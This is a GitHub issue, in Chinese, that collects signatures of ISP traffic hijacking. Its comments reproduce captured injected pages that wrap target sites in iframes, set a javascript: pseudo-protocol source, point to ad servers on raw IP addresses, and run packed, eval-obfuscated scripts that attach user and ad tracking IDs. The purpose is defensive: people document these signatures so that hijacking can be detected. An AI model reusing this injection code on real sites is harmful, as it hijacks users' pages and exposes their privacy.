Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

电信流量劫持的特征大收集 #1

Open
cssmagic opened this issue Dec 19, 2014 · 3 comments
Open

电信流量劫持的特征大收集 #1

cssmagic opened this issue Dec 19, 2014 · 3 comments

Comments

@cssmagic
Copy link
Member

大家在家上网如果发现流量劫持现象,请注意分析现场,并补充特征到这里。

注意事项

  • 分析现场的时候,不要刷新,一刷就没。
  • 查看页面源码没有价值,因为相当于重新请求,只会得到正常的页面源码。
  • 如果需要分析页面结构,请使用 DOM 检查器,或使用类似 “View Generated Source” 的功能。
@cssmagic
Copy link
Member Author

事故现场

<html>
<head>
<title><!-- empty --></title>
</head>
<body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
<div id="ad_id" class="ad-dialog" style="position: absolute;">...</div>
<iframe style="position:fixed;" src="{target-page-url}"></iframe>
</body>
</html>

特征概述

  • 页面标题为空。
  • 目标页面被包裹在一个 <iframe> 中,src 为目标页面 URL。

@cssmagic
Copy link
Member Author

事故现场

<html>
<head>
<title>{target-page-title}</title>
<script>
url = {a:"http://58.215.179.***/svr/flow/**",m:"http://www.jd.com/",s:"undefined"} //...
</script>
</head>
<body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
<div id="ad_id" class="ad-dialog" style="position: absolute;">
    <div>
        <iframe id="adframe" src="http://58.215.179.***/svr/flow/**"></iframe>
    </div>
</div>
<iframe style="position:fixed;" src="JavaScript:parent.goURLm()"></iframe>
</body>
</html>

特征概述

是上面一种情况的改进版,这些贼也变聪明了,试图躲避一些劫持探测工具。

  • 页面标题是目标页面的标题。
  • 目标页面被包裹在一个 <iframe> 中,但其 src 值为 javascript 伪协议。伪协议脚本运行后返回一个简化的 HTML 文档内容,该文档会自动跳转到目标页面。
  • 页面中有一个全局变量 url,用于提供广告地址和目标页面地址。
  • 页面加载的一些外部脚本资源(可能危及用户的 Cookie 等隐私)来自 aiyiqu.com 域。

@cssmagic
Copy link
Member Author

事故现场

<head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
    <style>
    @charset "utf-8";body, div, span, p, iframe,a{margin:0;padding:0;outline:none}.ad-dialog{position:absolute;z-index:998;padding:0px;font-size:12px;overflow:hidden;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;box-shadow:1px 2px 2px #999;-webkit-box-shadow:1px 2px 2px #999;-moz-box-shadow:1px 2px 2px #999}.ad-dialog .title{width:100%;height:25px;line-height:25px;text-align:left;text-indent:8px;font-size:12px;font-weight:bold;color:#FFF;background:#CCC;-webkit-border-top-left-radius:4px;-moz-border-top-left-radius:4px;border-top-left-radius:4px;-webkit-border-top-right-radius:4px;-moz-border-top-right-radius:4px;border-top-right-radius:4px}.ad-dialog .icon{position:absolute;top:0;right:0;margin-right:4px}.ad-dialog .icon a{width:20px;height:20px;margin:2px 0 0 2px;text-align:center;line-height:20px;float:left;display:inline-block;text-decoration:none;color:#FFF;font-family:Verdana, Geneva, sans-serif;font-weight:bold;font-size:15px;overflow:hidden}.ad-dialog .icon a:hover{color:#F00}.ad-dialog .icon a:hover span{border-color:#F00}.ad-dialog .icon a span{display:inline-block;margin:0px;padding:0;overflow:hidden;zoom:1}.ad-dialog .icon .icon-min span{height:8px;width:12px;margin:2px 3px;border-bottom:2px solid #FFF}.ad-dialog .icon .icon-max span{height:8px;width:8px;margin:4px 4px;border:2px solid #FFF}.ad-dialog .icon .icon-max span:hover{border:2px solid #F00}.ad-dialog .icon .icon-min span:hover{border-bottom:2px solid #F00}.ad-dialog .content{-webkit-border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;border-bottom-left-radius:4px;-webkit-border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;border-bottom-right-radius:4px}.style0{-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;box-shadow:none}.style0 .title{background:#CCC;color:#333}.style0 .content{-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px}.style0 .icon a{color:#333}.style0 .icon .icon-min span{border-color:#333}.style0 .icon .icon-max span{border-color:#333}.style1{border:1px solid #000}.style1 .title{background:#444}.style2{border:1px solid #0B4453}.style2 .title{background:#137893}.style3{border:1px solid #E91852}.style3 .title{background:#F27B9B}.style4{border:1px solid #BEA323}.style4 .title{background:#E6D479}.style5{border:1px solid #27AD85}.style5 .title{background:#58D9B3}.style6{border:1px solid #3E3564}.style6 .title{background:#5F529A}.style7{border:1px solid #DD6921}.style7 .title{background:#F9AA75}.style8{border:1px solid #285340}.style8 .title{background:#3F7F63}
    </style>
    <script>
    url={a:"http://120.27.28.39/yy/kd580087.html",m:"http://www.fang.com/ask/ask_10151218.html",s:"undefined"};var _iaui=true;var _xus="QUFPeEhWMlhzblNSaTcrNVd5VzU4UT09";var _xai="";var _xti="aXE3RGJtNWZJQ2JydWRCMzlRek02QT09";
    </script>
    <script>
    eval(function(p,a,c,k,e,r){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 1W={\'1U\':\'0\',\'1K\':U,\'1B\':\'\',\'1d\':\'1q 1V\',\'1P\':{\'1M\':\'1L\',\'1G\':1z},\'2a\':\'1I\',\'1p\':\'\',\'1C\':{\'w\':1,\'h\':1},\'1E\':\'1u\',\'1w\':{\'1x\':U,\'1A\':{\'w\':0,\'h\':0},\'1d\':\'\'}};7 1f(){E="1H+/=";1O.2c=7(k){5 H="";5 P,z,A,T,X,N,C;5 i=0;k=17(k);1Q(i&lt;k.p){P=k.L(i++);z=k.L(i++);A=k.L(i++);T=P&gt;&gt;2;X=((P&amp;3)&lt;&lt;4)|(z&gt;&gt;4);N=((z&amp;15)&lt;&lt;2)|(A&gt;&gt;6);C=A&amp;K;8(18(z)){N=C=19}J 8(18(A)){C=19}H=H+E.M(T)+E.M(X)+E.M(N)+E.M(C)}e H};17=7(v){v=v.F(/\\r\\n/g,"\\n");5 f="";I(5 n=0;n&lt;v.p;n++){5 c=v.L(n);8(c&lt;R){f+=l.u(c)}J 8((c&gt;1X)&amp;&amp;(c&lt;1Y)){f+=l.u((c&gt;&gt;6)|1Z);f+=l.u((c&amp;K)|R)}J{f+=l.u((c&gt;&gt;12)|26);f+=l.u(((c&gt;&gt;6)&amp;K)|R);f+=l.u((c&amp;K)|R)}}e f}}5 27=28 1f();7 29(){5 1a=/[&amp;\\?]2e=/i;8(!1a.1o(1c.a)&amp;&amp;1r){e 1s}e U}7 1t(){5 j=1c.m;8(j.1e(j.p-1)=="/")j=j.1e(0,j.p-1);e"&lt;1n&gt;&lt;/1v&gt;&lt;1h&gt;10.1y.F(\\""+j+"\\");&lt;\\/1h&gt;&lt;\\/1n&gt;"};1i.1k=7(q,D){I(5 i 1m D){8(16 D[i]!=="1F"){q[i]=D[i]}J{q[i]=q[i]||{};1i.1k(q[i],D[i])}}e q};7 $(o){5 d=10;7 c(G){5 s=d.1J(\'*\'),c=[];I(5 x=0;x&lt;s.p;x++){5 a=s[x].V;8(a){s[x].V.W(G)+1?c.1b(s[x]):\'\'}};e c.p==1?c[0]:c};e o.W("#")+1?d.1N(o.B("#")[1].Y(/\\S+/)):o.W(".")+1?c(o.B(".")[1].Y(/\\S+/)[0]):\'\'};7 1R(s){10.1S(s)};7 1T(9,G){8(!9||!9.Z){e}5 t=9.Z.1g,a=t.F(/;\\s+/O,";").B(\';\'),c=[],b=G.F(/;\\s+/O,";");8(t){I(5 i 1m a){8(a[i]){5 20=21(a[i].B(\':\')[0]);8(!b.Y(22("/"+a[i].B(\':\')[0]+"/O"))){c.1b(a[i])}}};b=(c.23(\';\')+\';\')+b};9.Z.1g=b.F(/%24/O,\'%\')};7 25(9,11){5 1j={\'Q\':\'V\'},y=9.1l("Q"),14=y?\'Q\':1j[\'Q\'];y=9.1l(14);9.2b(14,y?y+\' \'+11:11)};13=16(13)==\'2d\'?7(1D){}:13;',62,139,'|||||var||function|if|obj|||||return|utftext||||desturl|input|String||||length|t_||||fromCharCode|string|||cs|chr2|chr3|split|enc4|s_|_keyStr|replace|str|output|for|else|63|charCodeAt|charAt|enc3|ig|chr1|class|128||enc1|false|className|indexOf|enc2|match|style|document|name||extCallback|cls||typeof|_utf8_encode|isNaN|64|regex|push|url|position|slice|Base64|cssText|script|Object|fixattr|extend|getAttribute|in|html|test|opentype|right|_iaui|true|goURLm|style0|head|mini|able|location|60|size|title|adsize|para|skincolor|object|time|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|doc|getElementsByTagName|istitle|close|type|getElementById|this|delay|while|out|writeln|css|id|down|adparam|127|2048|192|reg|RegExp|eval|join|px|addClass|224|_base64|new|initIsAddUserId|loadfirst|setAttribute|encode|undefined|_us'.split('|'),0,{}))
    </script>
    <title>北京新天地的小区楼盘怎么样-房天下问答</title>
</head>

<body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
    <iframe width="100%" height="100%" frameborder="no" style="position: fixed; display: block;" onload="" scrolling="auto" src="JavaScript:parent.goURLm()" id="ifrmain"></iframe>
    <script>
    eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?"":e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('c=d(1){b(1.2.a.9(\'?\')&gt;0){1.2.a=1.2.a+"&amp;6="+1.4+"&amp;5="+1.3+"&amp;8="+1.7}f{1.2.a=1.2.a+"?6="+1.4+"&amp;5="+1.3+"&amp;8="+1.7};g(e)}',17,17,'|ad|url|adid|userid|_xai|_us|tid|_xti|indexOf||if|extCallback|function|true|else|setAdVisiable'.split('|'),0,{}))
    </script>
    <script>
    var ADwidth=0;var ADheight=0;var tmp_width=0;var tmp_height=0;var message={init:function(arg){var $t=this;var args={loadfirst:"ad",title:"-",istitle:false,mainsize:{w:'100%',h:'100%'},adsize:{w:300,h:180},position:"right down",delay:{type:'',time:3},opentype:"",mini:{able:true,size:{w:250,h:30},position:"left up"},skincolor:'style0'};$t.a=Object.extend(args,arg);$t.min_=0;var $t=this;loading(function(){$t.event();$t.animate();var param={url:url,userid:_xus,adid:_xai,tid:_xti};extCallback(param)});function loading(callback){$t.win();$t.max();$t.winchange();css($('#ifrmain'),"display:none;");css($('#ad_id'),"display:none;");if($t.a.loadfirst=="ad"){setTimeout(function(){css($('#ifrmain'),"display:block;")},1000);css($('#ad_id'),"display:block;");callback()}else if($t.a.loadfirst=="doc"){css($('#ifrmain'),"display:block;");$('#ifrmain').onload=function(){css($('#ad_id'),"display:block;");callback()}}}},win:function(){var $t=this;$('.tt_').innerHTML=$t.a.title;css($('.tt_'),"width:"+$t.a.adsize.w+"px;");addClass($('.ad_'),$t.a.skincolor);$t.a.istitle?css($('.tt_'),"display:block"):css($('.tt_'),"display:none")},min:function(){var $t=this;setTimeout(function(){$t.min_=1},500);css($('.min_'),"display:none");css($('.max_'),"display:block");var adIframe=document.getElementById("adframe");if(adIframe){adIframe.src=url.s}$t.position($t.a.mini.position,$t.a.mini.size)},position:function(dir,size){var $t=this,s=size,l,r,t,b,l1,r1,t1,b1;switch(dir){case"left down":l=2;t='';r='';b=2;break;case"left up":l=2;t=2;r='';b='';break;case"right down":l='';t='';r=2;b=2;break;case"right up":l='';t=2;r=2;b='';break;case"center":r='';b='';l=($t.screen().w-s.w)*0.5;t=($t.screen().h-s.h)*0.5;break;default:t=dir.split(" ")[0];l=dir.split(" ")[1];r='';b='';break};css($('.ad_'),"left:"+l+"px;top:"+t+"px;right:"+r+"px;bottom:"+b+"px;");ADwidth=s.w;ADheight=s.h;css($('#adframe'),"width:"+s.w+"px;height:"+s.h+"px;");css($('.tt_'),"width:"+s.w+"px;")},screen:function(){var $t=this,d=document,b=d.body,e=d.documentElement;return{w:e.clientWidth,h:Math.max(b.scrollTop,e.scrollTop)+/BackCompat/i.test(d.compatMode)?b.clientHeight:e.clientHeight}},close:function(){var a=$('.ad_');a.parentNode.removeChild(a)},max:function(){var $t=this;css($('.max_'),"display:none");css($('.min_'),"display:block");$t.min_=0;$t.position($t.a.position,$t.a.adsize);var adIframe=document.getElementById("adframe");if(adIframe){adIframe.src=url.a}$t.a.mini.able?'':css($('.min_'),'display:none;')},winchange:function(){var $t=this;setInterval(function(){if(self!=parent){try{var a=parent.document.getElementById("ad_id");a.parentNode.removeChild(a)}catch(e){}parent.document.getElementById("ifrmain").style.overflow="hidden"}},50)},animate:function(){var $t=this,i=0;if($t.a.delay.type=='min')setTimeout(function(){$t.min()},$t.a.delay.time*1000);if($t.a.delay.type=='close')setTimeout(function(){$t.close()},$t.a.delay.time*1000);if($t.a.opentype=='move'){$('.ad_').onmouseover=function(){if($t.min_==1){$t.max()}}}},event:function(){var $t=this;$('.close_').onclick=function(){$t.close()};$('.min_').onclick=function(){$t.min()};$('.max_').onclick=function(){$t.max()}}};message.init(adparam);var t;function v(){if(document.title!=''){clearTimeout(t);return};var doc;if(document.all){doc=document.frames["ifrmain"].document}else{doc=document.getElementById("ifrmain").contentDocument};document.title=doc?doc.title:"";t=setTimeout("v()",500)};v();function createADPage(){var html="&lt;iframe scrolling='no' frameborder='no' src='"+url.a+"' allowtransparency='true' id='adframe' class='ct_adframe'&gt;&lt;/iframe&gt;";$(".content").innerHTML=html;css($('#adframe'),"width:"+ADwidth+"px;height:"+ADheight+"px;")};function setAdVisiable(flag){if(flag){if($("#adframe")){}else{createADPage()}css($('#ad_id'),"display:block;")}else{css($('#ad_id'),"display:none;")}};
    </script>
    <script src="http://61.152.223.15:8080/js/jsstyle-yy.js"></script>
    <div id="nnn" style="width: 300px; height: 250px; position: absolute; top: 774px; left: 1618px;"><table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ececec"><tbody><tr><td valign="middle" height="1"></td><td valign="middle" align="right" style=""></td></tr><tr><td height="250" colspan="2"><div onclick="closePushDiv()" style="position:absolute; right:10px; top:10px; cursor:pointer;"><span style="font-weight:bold; font-size:13px;">关闭</span></div><div style="position:relative;"><iframe width="300" height="250" frameborder="0" scrolling="no" name="page" allowtransparency="true" src="http://139.196.30.10/yuexing/yuexing20160602.html"></iframe></div></td></tr></tbody></table>
    </div>
</body>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@cssmagic